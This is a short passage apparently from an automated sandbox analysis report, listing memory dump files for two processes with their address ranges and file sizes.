    • memory/2528-9-0x0000023426F50000-0x0000023426F72000-memory.dmp

      Filesize

      136KB

    • memory/2528-13-0x00000234271B0000-0x00000234271B8000-memory.dmp

      Filesize

      32KB

    • memory/2528-12-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/2528-11-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/2528-10-0x00007FF8EB650000-0x00007FF8EC112000-memory.dmp

      Filesize

      10.8MB

    • memory/2740-103-0x0000029C6AF90000-0x0000029C6B0C2000-memory.dmp

      Filesize

      1.2MB